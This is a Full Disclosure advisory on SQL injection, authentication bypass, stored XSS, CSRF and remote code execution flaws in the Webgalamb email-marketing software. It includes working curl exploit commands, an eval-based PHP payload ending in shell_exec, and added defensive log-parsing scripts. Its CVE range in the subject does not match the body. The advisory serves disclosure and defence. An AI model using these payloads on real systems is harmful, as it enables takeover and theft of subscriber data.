[FD] CVE-2018-19509-19513: multiple vulnerabilities (incl. critical pre-auth RCE) in Webgalamb
- To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] CVE-2018-19509-19513: multiple vulnerabilities (incl. critical pre-auth RCE) in Webgalamb
- From: Daniel Jones via Fulldisclosure <fulldisclosure@xxxxxxxxxxxx>
- Date: Wed, 02 Jan 2019 06:56:55 +0000
Summary
-------
Vendor: E.N.S. Zrt (www.ens.hu)
Product: Webgalamb (www.webgalamb.hu, www.facebook.com/webgalamb)
Webgalamb is a commercial email marketing software for managing subscription
lists and sending out bulk emails. It is not SaaS but a PHP-based web
application that is typically hosted next to the company website of Webgalamb
customers.
Webgalamb is vulnerable to multiple security flaws that could be exploited by
threat actors to take complete control of Webgalamb deployments and company
websites, and to exfiltrate the email subscription databases.
The findings were verified against the latest Webgalamb versions (v6 and v7);
older versions are probably also affected. The vendor confirmed the
vulnerabilities but did not share a remediation plan.
CVE-2018-19513: Information disclosure
--------------------------------------
The log files created by the application are exposed to the internet, and the
file names are predictable. For example:
http://www.victim.tld/webgalamb/files/logs/sql_error_log/2018-10-25-sql_error_log.log
The log file can contain sensitive client data (email addresses) and also
facilitates exploitation of the SQL injection flaws, since failed queries are
logged verbatim together with the server-side error message.
CVE-2018-19510: SQL injection in insert via Client-IP HTTP header
-----------------------------------------------------------------
curl -d "mail=test2@xxxxxxx&save=1" --header "Client-Ip: 'foo" -v
"http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83"
In the SQL log:
2018-10-25 18:06:38 - Url:
http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83
Bad SQL:[insert into `wg7_users` ( mail, omail, mail_id, ip, ip_orig, datum,
verify_code, active, g, a, ipdatum ) values
( 'test2@xxxxxxx',
'test2@xxxxxxx', '3', ''foo', ''foo', CURDATE(),
'k7k64a8kk71811fcb841k71k1f5ffda16ec96eff', '1', '1', '1', now() )]/You have an
error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near 'foo', ''foo', CURDATE(),
'k7k64a8kk71811fcb841k71k1f5ffda16ec96eff', '1', '1', '' at line 2 :
(c:\htdocs\webgalamb\subscriber.php:2241)
Example of a meaningful SQL injection:
curl -d "mail=test4@xxxxxxx&save=1" --header "Client-Ip: ', 5,CURDATE(), 7,
1,9,10, now()), ((SELECT GROUP_CONCAT(conf_value) FROM
wg7_config),2,3,4,5,CURDATE(),7,8,65535,1,NOW()) -- foo" -v
"http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83"
An UPDATE statement on wg7_users is vulnerable to the same pattern, so it is
possible to modify any user's subscription.
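CVE-2018-19513 makes the SQL error log readable by anyone, but the same log is also the defender's best evidence of CVE-2018-19510 attempts. As an added example (not code from the advisory or the vendor), the parser below reads entries in the format quoted above and flags VALUES literals that start with an injected quote, using the advisory's own log entry as the sample input:

```python
# Parse Webgalamb SQL error log entries (format as quoted in the advisory) and flag
# literals that broke out of their quotes. Added example; sample entry is the advisory's.
import re

ENTRY_RE = re.compile(
    r"(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) - Url:\s*(?P<url>\S+)\s*"
    r"Bad SQL:\[(?P<sql>.*?)\]/(?P<err>.*?)\s*:\s*\((?P<loc>[^)]+)\)",
    re.S,
)

def parse_entries(text):
    """One dict per log entry with ts, url, sql, err and loc (file:line) fields."""
    return [m.groupdict() for m in ENTRY_RE.finditer(text)]

def injected_values(sql):
    """Literals in the VALUES (...) list that begin with '' or carry an odd number
    of quotes: the ''foo shape an unescaped single quote in Client-IP leaves behind."""
    m = re.search(r"values\s*\((.*)\)\s*$", sql, re.S | re.I)
    if not m:
        return []
    # Split on commas between literals; sufficient for the flat shape of this log.
    raw = [v.strip() for v in m.group(1).split(",")]
    return [v for v in raw if v.startswith("''") or v.count("'") % 2 == 1]

SAMPLE_ENTRY = r"""2018-10-25 18:06:38 - Url:
http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83
Bad SQL:[insert into `wg7_users` ( mail, omail, mail_id, ip, ip_orig, datum,
verify_code, active, g, a, ipdatum ) values
( 'test2@xxxxxxx',
'test2@xxxxxxx', '3', ''foo', ''foo', CURDATE(),
'k7k64a8kk71811fcb841k71k1f5ffda16ec96eff', '1', '1', '1', now() )]/You have an
error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near 'foo', ''foo', CURDATE(),
'k7k64a8kk71811fcb841k71k1f5ffda16ec96eff', '1', '1', '' at line 2 :
(c:\htdocs\webgalamb\subscriber.php:2241)
"""
```

Running `injected_values(parse_entries(SAMPLE_ENTRY)[0]["sql"])` returns the two ip/ip_orig literals, which is exactly where the Client-IP header lands.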
CVE-2018-19515: Authentication bypass
-------------------------------------
The system/ajax.php script offers various functions that are supposed to be
available only to the administrator of the system.
However, by supplying one of the bgsend, atment_sddd1xGz or xls_bgimport query
parameters, most of these methods become available without authentication.
The following examples demonstrate this.
Dumping the database (email addresses of subscribed users), without
authentication:
curl -d "uidselect=&g=1"
http://www.victim.tld/webgalamb/system/ajax.php?atment_sddd1xGz=1
Response:
<a href="#" onclick="$('#un').val('test@xxxxxxx '); $('#u_ID').val('1');
return false;">test@xxxxxxx</a>
Combining the vulnerabilities above, it is possible to exfiltrate any data from
the system:
curl -d "uidselect=&g=65535"
http://www.victim.tld/webgalamb/system/ajax.php?atment_sddd1xGz=1
Response:
<a href="#"
onclick="$('#un').val('*4AD47E08DAE2BD4F0977EED5D23DC901359DF617,webgalamb/,0,,7.0.0,0,50,foo@xxxxxx,foo@xxxxxx,2018-10-23,,,,200,300,2018.10.23.
18:15:49,www.victim.tld,10000,0,0,80,30,0,2018-10-23,0,,g_admin,15000,500,5,127.0.0.1,,,,,,,,,,,,0,
'); $('#u_ID').val('14'); return
false;">*4AD47E08DAE2BD4F0977EED5D23DC901359DF617,webgalamb/,0,,7.0.0,0,50,foo@xxxxxx,foo@xxxxxx,2018-10-23,,,,200,300,2018.10.23.
18:15:49,www.victim.tld,10000,0,0,80,30,0,2018-10-23,0,,g_admin,15000,500,5,127.0.0.1,,,,,,,,,,,,0,</a>
Note that in this case the response contains the result of the GROUP_CONCAT over
the wg7_config table injected earlier, which also includes the administrator's
password (stored as a MySQL PASSWORD() hash).
CVE-2018-19509: Persistent XSS, targeting the administrator
-----------------------------------------------------------
The Webgalamb application seems to make some opportunistic calls to
htmlspecialchars() instead of using a templating engine with proper contextual
encoding.
Since it is possible to insert arbitrary strings into the database (see the SQL
injection above), arbitrary JavaScript can be executed in the administrator's
browser.
curl -d "mail=test5@xxxxxxx&save=1" --header "Client-Ip: ', 5,CURDATE(), 7,
1,9,10, now()),
(char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,60,47,115,99,114,105,112,116,62),2,3,4,5,CURDATE(),7,8,1,1,NOW())
-- foo" -v "http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83"
view-source:http://www.victim.tld/webgalamb/wg7.php?subscriber_ID=20&g=1&new_subscriber=1&link=g%3D1%26subscribers%3D1
...
<h2><script>alert(document.domain)</script> feliratkozó adatai</h2>
...
The same XSS attack could be mounted via other entry points as well.
CVE-2018-19511: CSRF
--------------------
The application does not implement any protection against CSRF attacks.
An external, attacker-controlled site could submit an HTTP POST request to
http://www.victim.tld/webgalamb/wg7.php?options=1 in the context of an
authenticated administrator to change the administrator's password and take
control of the Webgalamb installation.
CVE-2018-19512: Arbitrary code execution (as authenticated administrator)
-------------------------------------------------------------------------
curl -v --header "Cookie: PHPSESSID=762b286eef672d9b618894b7f47a20ca;
webgalamb6=3s4kcr7r7r5i47e68002r7ofn5" -F "file=@test-exploit.wgx"
http://www.victim.tld/webgalamb/system/ajax.php?wgmfile=1
Where test-exploit.wgx is:
@WGMX
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48d2d4PjxpbWFnZXM+PGltYWdlPjxuYW1lPi4uL3B3bmQucGhwPC9uYW1lPjxmaWxlPlBEOXdhSEFLY0dod2FXNW1ieWdwT3dvL1BnPT08L2ZpbGU+PC9pbWFnZT48L2ltYWdlcz48L3dneD4=
The uploaded code can then be executed via the following HTTP request:
http://www.victim.tld/webgalamb/files/images/pwnd.php
CVE-2018-19514: Arbitrary remote code execution without authentication
----------------------------------------------------------------------
Uploading a CSV file:
curl -v -F "file=@import.csv" -F "g=1"
"http://www.victim.tld/webgalamb/system/ajax.php?import_fupl=1&atment_sddd1xGz=1"
It is placed here:
http://www.victim.tld/webgalamb/files/feltolt.csv
Processing the file and inserting its lines into the wg7_import table:
curl -v --header "Cookie: webgalamb6=pid" -d "xls_converz=1" -d "g=1"
-d "exp=.csv"
"http://www.victim.tld/webgalamb/system/ajax.php?atment_sddd1xGz=1"
Processing it (inserting the data into the fields table):
curl -v
"http://www.victim.tld/webgalamb/system/ajax.php?xls_bgimport=1&pid=pid&g=1&X=0&Y=0"
The exploit payload looks like this (import.csv):
',eval($_SERVER[HTTP_C]),'{{int}}
Once it has been processed, arbitrary code can be executed via the subscription
form:
curl -d "mail=test1@xxxxxxx&save=1" --header "C: die(phpinfo());" -v
"http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83"
curl -d "mail=test1@xxxxxxx&save=1" --header "C:
die(shell_exec('whoami'));" -v
"http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83"
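Every unauthenticated chain above (CVE-2018-19515, CVE-2018-19514, CVE-2018-19512) passes through system/ajax.php with one of the named query parameters, and the log exposure and uploaded PHP leave distinctive paths in the web server access log. As an added example (not code from the advisory or the vendor), the script below triages access-log lines for those patterns and links the upload endpoint to a later request for PHP under the upload directory; the log lines are constructed, with paths taken from the advisory and a documentation-range client address:

```python
# Triage web-server access logs for the Webgalamb request patterns in this advisory.
# Added example, not vendor code; SAMPLE_LOG is constructed (documentation IP range).
import re
from urllib.parse import parse_qs, urlsplit

# Parameters reported as bypassing the admin check in system/ajax.php, and the upload/import entry points.
BYPASS_PARAMS = {"bgsend", "atment_sddd1xGz", "xls_bgimport"}
UPLOAD_PARAMS = {"import_fupl", "wgmfile"}
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def classify(line):
    """Finding tags for one combined-format access-log line (empty if benign or unparsable)."""
    m = LINE_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("path"))
    params = set(parse_qs(url.query, keep_blank_values=True))
    tags = []
    if url.path.endswith("/system/ajax.php"):
        if params & BYPASS_PARAMS:
            tags.append("ajax-auth-bypass-param")
        if params & UPLOAD_PARAMS:
            tags.append("ajax-upload-endpoint")
    if "/files/logs/" in url.path:  # CVE-2018-19513: log files fetched over HTTP
        tags.append("exposed-log-access")
    if "/files/images/" in url.path and url.path.endswith(".php"):
        tags.append("php-under-upload-dir")  # PHP executed from the upload directory
    return tags

def scan(log_text):
    """[(line_no, client_ip, tags)] for every suspicious line in the log text."""
    hits = ((no, LINE_RE.match(l), classify(l)) for no, l in enumerate(log_text.splitlines(), 1))
    return [(no, m.group("ip"), tags) for no, m, tags in hits if tags]

def rce_chain_clients(findings):
    """Clients that used an ajax.php upload endpoint and later fetched PHP from the upload dir."""
    seen = {}
    for _, ip, tags in findings:
        seen.setdefault(ip, set()).update(tags)
    return sorted(ip for ip, t in seen.items()
                  if {"ajax-upload-endpoint", "php-under-upload-dir"} <= t)

SAMPLE_LOG = """\
203.0.113.7 - - [25/Oct/2018:18:06:38 +0200] "POST /webgalamb/subscriber.php?g=1&f=b187b56a83 HTTP/1.1" 200 512
203.0.113.7 - - [25/Oct/2018:18:07:02 +0200] "GET /webgalamb/files/logs/sql_error_log/2018-10-25-sql_error_log.log HTTP/1.1" 200 2048
203.0.113.7 - - [25/Oct/2018:18:08:10 +0200] "POST /webgalamb/system/ajax.php?atment_sddd1xGz=1 HTTP/1.1" 200 1800
203.0.113.7 - - [25/Oct/2018:18:09:45 +0200] "POST /webgalamb/system/ajax.php?import_fupl=1&atment_sddd1xGz=1 HTTP/1.1" 200 30
203.0.113.7 - - [25/Oct/2018:18:11:00 +0200] "GET /webgalamb/files/images/pwnd.php HTTP/1.1" 200 9000
"""
```

The ordinary subscriber.php POST on the first line produces no finding, so a legitimate subscription form on the same host does not add noise.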
Timeline
--------
10/27/2018: Initial contact attempt with the vendor
10/31/2018: Second attempt with additional email addresses
10/31/2018: Initial feedback from the vendor, confirming the channel is
appropriate for receiving the report
10/31/2018: Report submitted
11/12/2018: Ping
11/12/2018: Webgalamb acknowledges the vulnerabilities
11/12/2018: Planned date of public disclosure communicated once again
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/